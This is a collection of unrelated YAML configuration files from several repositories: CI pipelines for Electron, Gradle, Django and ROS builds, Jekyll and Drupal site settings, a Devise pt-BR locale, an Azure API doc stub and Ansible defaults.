# Secrets not available in PR so don't use GCP.
if: github.event_name != 'pull_request'
uses: google-github-actions/setup-gcloud@v0.2.0
with:
version: '281.0.0'
service_account_key: ${{ secrets.GOOGLE_SERVICE_ACC_KEY }}
- name: Code-signing setup for macOS
if: github.event_name != 'pull_request' && matrix.os == 'macos-latest'
shell: bash
env:
P12_FILE_PATH: ~/Downloads/stanford_cert.p12
KEYCHAIN_NAME: codesign_keychain
KEYCHAIN_PASS: ${{ secrets.MAC_KEYCHAIN_PASS }}
CERT_KEY_PASS: ${{ secrets.STANFORD_CERT_KEY_PASS }}
run: |
gsutil cp gs://stanford_cert/Stanford-natcap-code-signing-cert-expires-2024-01-26.p12 $P12_FILE_PATH
bash ./scripts/setup_macos_keychain.sh
# these env variables tell electron-builder to do code signing
echo "CSC_KEYCHAIN=$KEYCHAIN_NAME" >> $GITHUB_ENV
echo "CSC_NAME='Stanford University'" >> $GITHUB_ENV
echo "CSC_KEY_PASSWORD=${{ secrets.STANFORD_CERT_KEY_PASS }}" >> $GITHUB_ENV
- name: Code-signing setup for Windows
if: github.event_name != 'pull_request' && matrix.os == 'windows-latest'
env:
P12_FILE: Stanford-natcap-code-signing-cert-expires-2024-01-26.p12
CLOUDSDK_PYTHON: ${{env.pythonLocation}}\python.exe
run: |
gsutil cp gs://stanford_cert/$P12_FILE ~/$P12_FILE
# all these variables are used by electron-builder
echo "CSC_LINK=~/$P12_FILE" >> $GITHUB_ENV
echo "CSC_KEY_PASSWORD=${{ secrets.STANFORD_CERT_KEY_PASS }}" >> $GITHUB_ENV
echo "CSC_IDENTITY_AUTO_DISCOVERY=false" >> $GITHUB_ENV
- name: Run electron-builder
env:
GH_TOKEN: env.GITHUB_TOKEN
DEBUG: electron-builder
run: yarn run dist
- name: Test electron app with puppeteer
run: yarn run test-electron-app
- name: Upload app logging from puppeteer to github - MacOS
uses: actions/upload-artifact@v2.2.4
if: matrix.os == 'macos-latest' && always()
with:
name: 'macos_puppeteer_log.zip'
path: '~/Library/Logs/invest-workbench/'
- name: Upload app logging from puppeteer to github - Windows
uses: actions/upload-artifact@v2.2.4
if: matrix.os == 'windows-latest' && always()
with:
name: 'windows_puppeteer_log.zip'
path: '~/AppData/Roaming/invest-workbench/logs/'
- name: Upload installer artifacts to github
uses: actions/upload-artifact@v2.2.4
if: ${{ always() }}
with:
name: invest-workbench-${{ matrix.os }}
path: dist/invest_*_workbench_*
- name: Set variables for GCS deploy target
if: github.event_name != 'pull_request'
run: |
echo "VERSION"=$(cat .workbench_version_string.env) >> $GITHUB_ENV
echo "BUCKET=$([ ${{ github.repository_owner }} == 'natcap' ] \
&& echo 'gs://releases.naturalcapitalproject.org/invest-workbench' \
|| echo 'gs://natcap-dev-build-artifacts/invest-workbench/${{ github.repository_owner }}' \
)" >> $GITHUB_ENV
- name: Deploy artifacts to GCS - Windows
if: github.event_name != 'pull_request' && matrix.os == 'windows-latest'
env:
CLOUDSDK_PYTHON: ${{env.pythonLocation}}\python.exe
run: |
gsutil -m rsync dist/ "${{ env.BUCKET }}/${{ env.VERSION }}/"
- name: Deploy artifacts to GCS - macOS
if: github.event_name != 'pull_request' && matrix.os == 'macos-latest'
run: |
gsutil -m rsync dist/ "${{ env.BUCKET }}/${{ env.VERSION }}/"
|
.github/workflows/build-electron.yml
|
app_name: App_name # Required
app_description: Description # Optional
profile: aws_profile # if use profile config, overwrite with --profile option
# If use credentials(key, secret)
aws_key: aws_key
aws_secret: aws_secret
stages: # Required, Hash
development: # Stage name
web: # Env name
name: web01 # Optional, default: #{env_name}-#{stage_name}
description: Description # Optional,
cname_prefix: prefix # Optional
tier: web or worker # Optional, default: web
instance_type: t2.small # Optional, default: t2.small
instance_num: # Optional, min 1 max 1
min: 1
max: 1
key_name: # Optional, if not set you cannot ssh into ec2 instances
instance_profile: iam_profile # Optional, default: aws-elasticbeanstalk-ec2-role
# http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html
solution_stack_name: Ruby # Optional, default: "64bit Amazon Linux 2017.09 v2.6.0 running Ruby 2.4 (Puma)"
env_file: .env.development # Optional
environment_variables: # Optional, nil will be deleted when update,
# Use `rebi get_env stage --from-config` to get env settings
# This will be merged into variables from env_file and cfg_file
# Nil env will be deleted when deploy
- TIER: web
ebextensions: ebextension folders # Optional, String or Array of Strings
# .ebextensions will be added automatically if not exists
# The below one will be merge in to be above one
# Example: .ebextensions has 01.config, web_extensions, 02.config, web1_extensions 02.config and 03.config
# ebextensions:
# - web_extensions
# - web1_extensions
# Result will has 01.config, 02.config(from web1_extensions) and 03.config
dockerrun: Dockerrun.aws.json.stg # Dockerrun file
options: # Hash, Other custom options for using in erb
use_basic: true # rebi.opts.use_basic
ebignore: .ebignore_web # Optional
hooks:
pre: ls # String or Array, run before upload source bundle
post: ls # String or Array, run right after sending deploy request
worker:
# ...
staging:
# ...
production:
# ...
|
sample/rebi.yml
|
---
pt-BR:
views:
devise:
shared:
log_in: "Faça login"
sign_up: "Cadastre-se"
forgot_password: "<PASSWORD>ha?"
confirmation_instructions: "Não recebeu as instruções da verificação?"
unlock_instructions: "Não recebeu as instruções do desbloquieo?"
provider_sign_in: "Autentique-se com %{provider_name}"
registrations:
create: "Crie sua conta de %{resource_name}"
min_password_length: "%{length} caractères no mínimo"
edit: "Troque sua senha"
awaiting_confirmation: "Aguardando verificação de conta pelo e-mail %{email}"
leave_blank: "(deixe em branco se não deseja alterar sua senha)"
current_password: "(precisamos tua senha atual para verificar a mudança)"
destroy: "Apagar minha conta"
destroy_confirmation: "Esta ação é irreversível. Tem certeza?"
sessions:
create: "Faça login como %{resource_name}"
remember_me: "Mantenha-me logado"
passwords:
create: "Recupere sua senha"
send_instructions: "Enviar instruções de recuperação de senha"
edit: "Troque de senha"
new_password: "<PASSWORD>"
confirm_new_password: "<PASSWORD>"
confirmations:
new: "Re-envio de instruções de verificação de %{resource_name}"
send_instructions: "Enviar instruções de verificação"
unlocks:
new: "Re-envio de instruções de desbloquieo de %{resource_name}"
send_instructions: "Enviar instruções de desbloquieo"
mailer:
confirmation_instructions:
welcome: "Welcome %{email}!"
instruction: "Verifique a sua conta pelo link:"
confirm_account: "Verificar minha conta"
email_changed:
greeting: "Hola %{email}!"
email_changing_message: "Enviamos esta mensagem para te avisar que teu e-mail está sendo alterado para %{new_email}."
email_changed_message: "Enviamos esta mensagem para te avisar que teu e-mail foi alterado para %{new_email}."
password_change:
greeting: "Hola %{email}!"
message: "Enviamos esta mensagem para te avisar que tua senha foi alterada."
reset_password_instructions:
greeting: "Hola %{email}!"
message1: "Alguem solicitou um link para o reset da tua senha. Voce pode trocar tua senha pelo link:"
change_password: Trocar minha senha
message2: "Se você não fez esta solicitação, por favor iginore este e-mail."
message3: "Tua senha não mudara almenos que voce acesse o link acima e crie uma nova."
unlock_instructions:
greeting: "Hola %{email}!"
message1: "Tua conta foi bloqueada devido a um número excesivo de tentativas de login inválidas."
message2: "Clique no link para desbloquear sua conta:"
unlock_account: Unlock my account
|
config/locales/pt-BR/views/devise.yml
|
name: Java System CI with Gradle
on:
release:
branches: [ master ]
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- uses: actions/cache@v2
with:
path: |
~/hedera-nft-auction-demo-java-node/.gradle/caches
~/hedera-nft-auction-demo-java-node/.gradle/wrapper
key: ${{ runner.os }}-gradle-${{ hashFiles('**/*.gradle*', '**/gradle-wrapper.properties') }}
restore-keys: |
${{ runner.os }}-gradle-`
- name: Set up JDK 14
uses: actions/setup-java@v2
with:
java-version: '14'
distribution: 'adopt'
- name: Grant execute permission for gradlew
run: cd hedera-nft-auction-demo-java-node && chmod +x gradlew
- name: Create certificates
run: |
cd docker-files
openssl req -config certs.cnf -newkey rsa:2048 -new -nodes -x509 -days 3650 -keyout key.pem -out cert.pem
- name: Build with Gradle
env:
OPERATOR_ID: ${{ secrets.OPERATOR_ID }}
OPERATOR_KEY: ${{ secrets.OPERATOR_KEY }}
MASTER_KEY: ${{ secrets.OPERATOR_KEY }}
NETWORK: testnet
# Run the REST API true/false
REST_API: true
API_PORT: 8081
API_VERTICLE_COUNT: 1
# Run the admin REST API true/false
ADMIN_API_PORT: 8082
ADMIN_API_VERTICLE_COUNT: 1
HTTPS_KEY_OR_PASS: ../docker-files/key.pem
HTTPS_CERTIFICATE: ../docker-files/cert.pem
# Run the Auction Node true/false
AUCTION_NODE: true
# only if participating in refund transactions
TRANSFER_ON_WIN: true
# auction topic details
TOPIC_ID:
# mirror node detail
# the mirror provider may be hedera, kabuto or dragonglass
MIRROR_PROVIDER: hedera
MIRROR_QUERY_FREQUENCY: 5000
# Database information for transaction and event logging
DATABASE_URL: postgresql://localhost:5432/
POSTGRES_DB: nftauction
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
# REST Mirror urls
REST_HEDERA_MAINNET: mainnet.mirrornode.hedera.com
REST_HEDERA_TESTNET: testnet.mirrornode.hedera.com
# REST_HEDERA_PREVIEWNET: previewnet.mirrornode.hedera.com
REST_HEDERA_PREVIEWNET: 172.16.31.10
run: cd hedera-nft-auction-demo-java-node && ./gradlew build testSystem
|
.github/workflows/system-test.yml
|
pool:
vmImage: 'Ubuntu 18.04'
steps:
- task: UsePythonVersion@0
inputs:
versionSpec: 3.6
architecture: 'x64'
- task: DownloadSecureFile@1
name: secret
displayName: 'Download secret.py file'
inputs:
secureFile: 'secret.py'
- task: DownloadSecureFile@1
name: settings
displayName: 'Download settings.py file'
inputs:
secureFile: 'settings.py'
- task: DownloadSecureFile@1
name: startup
displayName: 'Download startup.sh file'
inputs:
secureFile: 'startup.sh'
- task: DownloadSecureFile@1
name: wsgi
displayName: 'Download wsgi.py file'
inputs:
secureFile: 'wsgi.py'
- task: PythonScript@0
displayName: 'Export project path'
inputs:
scriptSource: 'inline'
script: |
"""Search alll subdirectories for `manage.py`."""
from glob import iglob
from os import path
# Python >= 3.5
manage_py = next(iglob(path.join('**', 'manage.py'), recursive=True), None)
if not manage_py:
raise SystemExit('Could not find a Django project')
project_location = path.dirname(path.abspath(manage_py))
print('Found Django project in', project_location)
print('##vso[task.setvariable variable=projectRoot]{}'.format(project_location))
- script: |
cp $(secret.secureFilePath) /home/vsts/work/1/s/secret.py
cp $(settings.secureFilePath) /home/vsts/work/1/s/settings.py
cp $(startup.secureFilePath) /home/vsts/work/1/s/startup.sh
cp $(wsgi.secureFilePath) /home/vsts/work/1/s/wsgi.py
displayName: 'Copy files to build agent'
- task: ShellScript@2
inputs:
scriptPath: filecopy.sh
cwd: '/'
- script: |
python -m pip install --upgrade pip setuptools wheel django
pip install -r requirements_docker.txt
pip install unittest-xml-reporting
displayName: 'Install prerequisites'
- script: |
pushd '$(projectRoot)'
python manage.py test --testrunner xmlrunner.extra.djangotestrunner.XMLTestRunner --no-input
condition: succeededOrFailed()
displayName: 'Run tests'
- task: PublishTestResults@2
condition: succeededOrFailed()
inputs:
testResultsFiles: "**/TEST-*.xml"
testRunTitle: 'Python $(PYTHON_VERSION)'
- task: Docker@2
displayName: Login to Azure Container Registry
inputs:
command: login
containerRegistry: MyContainerRegistry
- task: Docker@2
displayName: Build and Push to ACR
inputs:
command: buildAndPush
repository: prop_dev
|
azure-pipelines.yml
|
name: Azure_Kinect_ROS_Driver-$(SourceBranchName)-$(Date:yyyyMMdd)-$(Rev:rrr)
trigger:
batch: true
branches:
include:
- master
- develop
- melodic
pr:
autoCancel: true
branches:
include:
- master
- develop
- melodic
jobs:
- job: WindowsMelodic
displayName: Windows Melodic
pool:
vmImage: 'vs2017-win2016'
steps:
- checkout: self
clean: "all"
fetchDepth: 20
lfs: false
persistCredentials: true
submodules: true
path: catkin_ws\src\Azure_Kinect_ROS_Driver
# Install Chcolatey
- powershell: Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
# Install ROS
- powershell: |
choco source add -n=ros-win -s="https://roswin.azurewebsites.net/api/v2" --priority=1
choco upgrade ros-melodic-ros_base -y --execution-timeout=0
# Create a catkin workspace
- script: |
C:\opt\ros\melodic\x64\setup.bat
mkdir %BUILD_SOURCESDIRECTORY%\catkin_ws
mkdir %BUILD_SOURCESDIRECTORY%\catkin_ws\src
cd %BUILD_SOURCESDIRECTORY%\catkin_ws
catkin_make
displayName: Create Catkin Workspace
# Download and install the Azure Kinect Sensor SDK
- powershell: |
wget http://download.microsoft.com/download/1/9/8/198048e8-63f2-45c6-8f96-1fd541d1b4bc/Azure%20Kinect%20SDK%201.2.0.msi -OutFile $(Build.SourcesDirectory)\sdk.msi
$(Build.SourcesDirectory)\sdk.msi /passive
# Build the catkin workspace
- script: |
C:\opt\ros\melodic\x64\setup.bat
cd %BUILD_SOURCESDIRECTORY%\catkin_ws
catkin_make --force-cmake
displayName: Build ROS Driver Node
- job: LinuxMelodic
displayName: Linux Melodic
pool:
vmImage: 'ubuntu-16.04'
container:
image: ros:melodic-perception-bionic
options: "--name ci-container -v /usr/bin/docker:/tmp/docker:ro"
steps:
- script: |
/tmp/docker exec -t -u 0 ci-container \
sh -c "apt-get update && DEBIAN_FRONTEND=noninteractive apt-get -o Dpkg::Options::="--force-confold" -y install sudo"
displayName: Enable sudo
- checkout: self
clean: "all"
fetchDepth: 20
lfs: false
persistCredentials: true
submodules: true
path: catkin_ws/src/Azure_Kinect_ROS_Driver
# Download and install the Azure Kinect Sensor SDK
- bash: |
sudo apt-get -y install curl software-properties-common
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo apt-add-repository https://packages.microsoft.com/ubuntu/18.04/prod
sudo apt-get update
echo libk4a1.2 libk4a1.2/accept-eula boolean true | sudo debconf-set-selections
echo libk4a1.2 libk4a1.2/accepted-eula-hash string 0f5d5c5de396e4fee4c0753a21fee0c1ed726cf0316204edda484f08cb266d76 | sudo debconf-set-selections -u
sudo apt-get -y install libk4a1.2-dev
displayName: Install the Azure Kinect Sensor SDK
# Build the catkin workspace
- bash: |
source /opt/ros/melodic/setup.bash
catkin_make --force-cmake
displayName: Build ROS Driver Node
workingDirectory: ../../
|
azure-pipelines.yml
|
menu:
- {name: 'About', url: 'pages/about.html'}
- {name: 'Projects', url: ''}
# - {name: 'Resume', url: 'pages/resume.html'}
- {name: 'Resume', url: "pages/artia_resume.pdf"}
- {name: 'Contact', url: 'pages/contact.html'}
#-------------------------------
# SEO Section
# NOTE: Providing SEO information will make this website more searchable on the internet.
seo:
description: 'Personal portfolio powered by Jekyll and GitHub Pages '
rel-author: 'https://plus.google.com/u/0/#'
rel-publisher: 'https://plus.google.com/u/0/#'
#-------------------------------
# Google Analytics Section
# Analytics helps you understand who visits your website.
# Learn more at: http://support.google.com/analytics/answer/1008065
# NOTE: If you want to use Google Analytics for basic web tracking: Just uncomment and enter your UA-Code here.
# If you are not using Google Analytics, please change 'google-ID' to an empty string
google-analytics-ua: 'UA-112060364-3'
#-------------------------------
# Disqus Section
# Change to true for Disqus comments
disqus:
comments: false
disqus_shortname: 'thathungrymind'
#-------------------------------
# About Section
about: >
Hi! I am a Graduate student at the Robotics Institute in Carnegie Mellon University, pursuing my Master's in Robotic Systems Development. From September 2019 to December 2020, advised by Prof. <NAME>, I developed a robotic surgical system that can localize embedded liver tumors.
My most recent work experience was at Johnson & Johnson, in the Robotics & Digital Surgery group where I defined functional requirements for a robot arm to perform manipulation tasks, and also automated the testing of critical robotic faults.
In the past, I have had the opportunity to spend two summers interning at <NAME>ufacturing Solutions GmbH where I programmed collaborative robots to perform specific tasks to meet end-user requirements.
Within the robotics domain, my areas of interest are motion planning, robot controls, spatial kinematics, rigid body transformations, and point-cloud registration techniques.
contact: >
Thank you for stopping by! If you would like to discuss my work further, please reach out to me at [<EMAIL>](mailto:<EMAIL>).
#-------------------------------
# Work Section
resume: >
# Resume
projects:
- {name: 'Augmented Reality for Minimally Invasive Surgery', folder: 'proj-1', file: 'projects/proj-1.html'}
- {name: 'Planning for a High-DOF Planar Arm', folder: 'proj-2', file: 'projects/proj-2.html'}
- {name: 'Robotic Bin Picking', folder: 'proj-3', file: 'projects/proj-3.html'}
- {name: 'Catch a Moving Target', folder: 'proj-4', file: 'projects/proj-4.html'}
- {name: 'Path Planning on Constraint Manifolds', folder: 'proj-5', file: 'projects/proj-5.html'}
- {name: 'Spatial Kinematics of a 7-DoF Robotic Arm', folder: 'proj-6', file: 'projects/proj-6.html'}
- {name: 'Extended Kalman Filter for 2D SLAM', folder: 'proj-7', file: 'projects/proj-7.html'}
- {name: 'Control and Trajectory Generation of a Quadcopter', folder: 'proj-8', file: 'projects/proj-8.html'}
- {name: 'Object Tracking', folder: 'proj-9', file: 'projects/proj-9.html'}
#-------------------------------
# Contact Section
social:
- {icon: 'github', link: 'https://github.com/ArtiAnantharaman'}
- {icon: 'linkedin', link: 'https://www.linkedin.com/in/arti-anantharaman'}
- {icon: 'envelope', link: 'mailto:<EMAIL>'}
|
_data/settings.yml
|
langcode: en
status: true
dependencies:
module:
- tour_getting_started
id: getting-started
label: 'User Page After Login'
module: tour_getting_started
routes:
-
route_name: entity.user.canonical
tips:
admin-menu:
id: admin-menu
plugin: text
label: 'Admin Menu'
weight: -100
attributes:
data-id: toolbar-item-administration
body: 'Do you see the admin menu? Click the Manage toggle button to display the admin menu if it does not already display for you. Then restart this tour by clicking the blue tour button at the top right of this screen.'
location: top
manage-your-content:
id: manage-your-content
plugin: text
label: 'Manage your content'
weight: -99
attributes:
data-class: toolbar-icon-system-admin-content
body: 'See all your existing content by clicking the "Content" menu item.'
location: bottom
add-a-new-page:
id: add-a-new-page
plugin: text
label: 'Add a new page'
weight: -98
attributes:
data-class: toolbar-icon-system-admin-content
body: 'To add a new page go to Content > Add Content and choose the type of content you would like to create.'
location: bottom
edit-menu-items:
id: edit-menu-items
plugin: text
label: 'Structure Menu'
weight: -97
attributes:
data-class: 'toolbar-menu > li > .toolbar-icon-system-admin-structure'
body: 'To edit Menus, Taxonomies, and Webforms, hover over the Structure menu and choose an item to edit. '
location: bottom
appearance-menu:
id: appearance-menu
plugin: text
label: 'Appearance Menu'
weight: -96
attributes:
data-class: toolbar-icon-system-themes-page
body: 'Appearance is where your theme is turned on. Exercise extreme caution. You will not need to edit anything here.'
location: bottom
extend-menu:
id: extend-menu
plugin: text
label: 'Extend Menu'
weight: -95
attributes:
data-class: toolbar-icon-system-modules-list
body: 'This is where modules are installed and activated. Do not modify, uninstall, or update any modules as this could cause sitewide issues to occur.'
location: bottom
configuration:
id: configuration
plugin: text
label: 'Configuration Menu'
weight: -94
attributes:
data-class: toolbar-icon-system-admin-config
body: 'Exercise extreme caution within the configuration menu. The majority of content administrators will NOT need to modify anything here. Contact your web master with any questions.'
location: bottom
manage-users:
id: manage-users
plugin: text
label: 'Manage Users'
weight: -93
attributes:
data-class: toolbar-icon-entity-user-collection
body: 'Add new users and manage existing users under the People menu item. You can also assign different roles to different users. For example, Administrators vs Content Editors.'
location: bottom
reports-menu:
id: reports-menu
plugin: text
label: 'Reports Menu'
weight: -92
attributes:
data-class: 'toolbar-menu > li > .toolbar-icon-system-admin-reports'
body: 'Reports provide information about your website including available updates, log messages, and status reports such as your Drupal version, web server, php version, and any errors or warnings.'
location: bottom
help-menu:
id: help-menu
plugin: text
label: 'Help Menu'
weight: -91
attributes:
data-class: toolbar-icon-help-main
body: 'Typically used by developers and web masters, the help menu provides resource links to Drupal documentation and definitions.'
location: bottom
edit-a-page:
id: edit-a-page
plugin: text
label: 'Edit a page'
weight: -90
attributes:
data-class: 'tabs--primary a[href*="/edit"]'
body: 'When you''re logged in you can edit most pages by clicking the "edit" link attached to the bottom of your screen.'
location: top
|
web/modules/backofficethinking/backoffice_thinking_tours/config/install/tour.tour.getting-started.yml
|
uid: management.azure.com.backup.jobs.export
name: Export
service: Recovery Services - Backup
groupName: Jobs
apiVersion: 2017-07-01
summary: Triggers export of jobs specified by filters and returns an OperationID to track.
consumes:
- application/json
produces:
- application/json
paths:
- content: POST https://management.azure.com/Subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupJobsExport?api-version=2017-07-01
- content: POST https://management.azure.com/Subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupJobsExport?api-version=2017-07-01&$filter={$filter}
isOptional: true
uriParameters:
- name: subscriptionId
in: path
isRequired: true
description: The subscription Id.
types:
- uid: string
- name: resourceGroupName
in: path
isRequired: true
description: The name of the resource group where the recovery services vault is present.
types:
- uid: string
- name: vaultName
in: path
isRequired: true
description: The name of the recovery services vault.
types:
- uid: string
- name: api-version
in: query
isRequired: true
description: Client Api Version.
types:
- uid: string
- name: $filter
in: query
description: OData filter options.
types:
- uid: string
responses:
- name: 202 Accepted
description: Accepted
requestHeader: []
definitions: []
examples:
- name: Export Jobs
request:
uri: POST https://management.azure.com/Subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/SwaggerTestRg/providers/Microsoft.RecoveryServices/vaults/NetSDKTestRsVault/backupJobsExport?api-version=2017-07-01
responses:
- statusCode: "202"
headers:
- name: Location
value: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/SwaggerTestRg/providers/Microsoft.RecoveryServices/vaults/NetSDKTestRsVault/backupJobs/operationResults/00000000-0000-0000-0000-000000000000?api-version=2017-07-01
- name: Retry-After
value: "60"
security:
- type: oauth2
description: Azure Active Directory OAuth2 Flow
flow: implicit
authorizationUrl: https://login.microsoftonline.com/common/oauth2/authorize
scopes:
- name: user_impersonation
description: impersonate your user account.
|
docs-ref-autogen/backup/Jobs/Export.yml
|
layout: sidebar
style: light
plugins:
- jekyll-octicons
- jekyll-github-metadata
- jemoji
permalink: /:year/:month/:day/:title/
defaults:
-
scope:
path: "" # an empty string here means all files in the project
type: "posts"
values:
layout: "post"
projects:
sort_by: pushed
# sort_by options:
# - pushed
# - stars
limit: 12
exclude:
forks: true
projects:
# - repo-name
social_media:
# behance: your_username
# dribbble: your_username
# facebook: your_username
# hackerrank: your_username
# instagram: your_username
# keybase: your_username
medium: "@jvandenaardweg"
# stackoverflow: your_user_id
# telegram: your_username
# dribbble: your_username
linkedin: "jvandenaardweg"
stackoverflow: "3194288"
medium: "@jvandenaardweg"
# twitter: your_username
# unsplash: your_username
# vk: your_username
# website: http://your_website_url
# youtube: your_username
topics:
- name: JavaScript
web_url: https://github.com/topics/javascript
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/javascript/javascript.png
- name: TypeScript
web_url: https://github.com/topics/typescript
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/typescript/typescript.png
- name: React
web_url: https://github.com/topics/react
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/react/react.png
- name: Node
web_url: https://github.com/topics/node
image_url: https://raw.githubusercontent.com/github/explore/fd96fceccf8c42c99cbe29cf0f8dcc4736fcb85a/topics/nodejs/nodejs.png
- name: Vue
web_url: https://github.com/topics/vue
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/vue/vue.png
- name: React Native
web_url: https://github.com/topics/react-native
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/react-native/react-native.png
- name: Redux
web_url: https://github.com/topics/redux
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/redux/redux.png
- name: PostgreSQL
web_url: https://github.com/topics/postgresql
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/postgresql/postgresql.png
- name: Docker
web_url: https://github.com/topics/docker
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/docker/docker.png
- name: Express
web_url: https://github.com/topics/express
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/express/express.png
- name: Webpack
web_url: https://github.com/topics/webpack
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/webpack/webpack.png
- name: Git
web_url: https://github.com/topics/git
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/git/git.png
- name: npm
web_url: https://github.com/topics/npm
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/npm/npm.png
- name: SASS
web_url: https://github.com/topics/sass
image_url: https://raw.githubusercontent.com/github/explore/6c6508f34230f0ac0d49e847a326429eefbfc030/topics/sass/sass.png
|
_config.yml
|
features.export:
path: '/admin/config/development/configuration/features'
defaults:
_form: '\Drupal\features_ui\Form\FeaturesExportForm'
_title: 'Features'
requirements:
_permission: 'export configuration'
features.assignment:
path: '/admin/config/development/configuration/features/bundle/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentConfigureForm'
_title: 'Bundle assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_base:
path: '/admin/config/development/configuration/features/bundle/_base/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentBaseForm'
_title: 'Configure base package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_core:
path: '/admin/config/development/configuration/features/bundle/_core/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentCoreForm'
_title: 'Configure core package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_exclude:
path: '/admin/config/development/configuration/features/bundle/_exclude/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentExcludeForm'
_title: 'Configure package exclusion'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_optional:
path: '/admin/config/development/configuration/features/bundle/_optional/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentOptionalForm'
_title: 'Configure optional package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_profile:
path: '/admin/config/development/configuration/features/bundle/_profile/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentProfileForm'
_title: 'Configure profile package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.assignment_site:
path: '/admin/config/development/configuration/features/bundle/_site/{bundle_name}'
defaults:
_form: '\Drupal\features_ui\Form\AssignmentSiteForm'
_title: 'Configure site package assignment'
bundle_name: NULL
requirements:
_permission: 'administer site configuration'
features.edit:
path: '/admin/config/development/configuration/features/edit/{featurename}'
defaults:
_form: '\Drupal\features_ui\Form\FeaturesEditForm'
_title: 'Edit'
featurename: ''
requirements:
_permission: 'administer site configuration'
features.diff:
path: '/admin/config/development/configuration/features/diff/{featurename}'
defaults:
_form: '\Drupal\features_ui\Form\FeaturesDiffForm'
_title: 'Differences'
featurename: ''
requirements:
_permission: 'administer site configuration'
features.detect:
path: '/features/api/detect/{name}'
defaults:
_controller: '\Drupal\features_ui\Controller\FeaturesUIController::detect'
requirements:
_permission: 'administer site configuration'
|
drupal/modules/features/modules/features_ui/features_ui.routing.yml
|
uid: advocates.tim-heuer
name: <NAME>
metadata:
title: <NAME> - Cloud Advocate
description: Home page for <NAME>, a Microsoft Cloud Advocate
remarks: |
## Bio
I've been working as a software developer ever since my studies in law. O_O – hey, tech paid the bills more than law was going to accumulate them. I've worked for Microsoft for 12 years and always in developer space, I absolutely love software development. Prior to Microsoft I wrote software for healthcare systems and interop systems (remember Site Server anyone?) to bridge brick-and-mortar AS400 systems to the Interwebs to sell their goods online. I've primarily worked on front-end technologies and specialized in UI frameworks with my time working on the WPF, Silverlight, Windows Phone and Windows teams being the lead for the XAML framework. I love the challenges cross-platform brings to developers and how the cloud is a common denominator for mobile! I'm very excited to help .NET developers building mobile apps be successful on Azure!
In my spare time, I've become addicted to cycling and can usually be found trying to ride off whatever food I just ate in hopes to be able to eat some more. While I'm not in school anymore, I'm constantly being educated on what the cool kids are doing through my son and daughter and escaping with my wife whenever we can.
## Skills
* .NET / C#
* Xamarin
* XAML
## Code, talks, and stuff
* [Alexa.NET](https://github.com/timheuer/alexa-skills-dotnet) - A .NET Core SDK to help with interacting with Alexa conversations.
* [Callisto](https://github.com/timheuer/callisto) - A UI toolkit for Universal Windows Platform applications.
* [TagLib# (portable)](https://github.com/timheuer/taglib-sharp-portable) - Making the TagLib# library available for anyone (man, I need to move this to .NET Standard!)
* [Talks on Channel 9](https://channel9.msdn.com/Events/Speakers/Tim-Heuer) - A collection of some presentations on [Channel 9](http://channel9.msdn.com)
* [Build 2017 UI Recap](http://timheuer.com/blog/archive/2017/05/15/build-2017-recap-windows-ui-xaml.aspx)
tagline: .NET / Xamarin
image:
alt: "<NAME> Cloud Advocate"
src: media/profiles/tim-heuer.png
twitter: https://twitter.com/timheuer
github: https://github.com/timheuer
blog: http://timheuer.com/blog/
instagram: https://www.instagram.com/timheuer
stackoverflow: https://stackoverflow.com/users/705/tim-heuer
linkedin: https://linkedin.com/in/timheuer
location:
display: Redmond, Washington, United States
lat: 47.679194
long: -122.153322
|
advocates/tim-heuer.yml
|
---
# defaults file for getenvoy
getenvoy_ver: 0.4.1
getenvoy_mirror: https://github.com/tetratelabs/getenvoy/releases/download
getenvoy_parent_install_dir: /usr/local
getenvoy_os: linux
getenvoy_arch: amd64
#getenvoy_install:
# - version: 1.14.2
# - version: 1.17.1
#getenvoy_link:
# version: 1.14.2
getenvoy_checksums:
# https://github.com/tetratelabs/getenvoy/releases/download/v0.2.0/checksums.txt
'0.2.0':
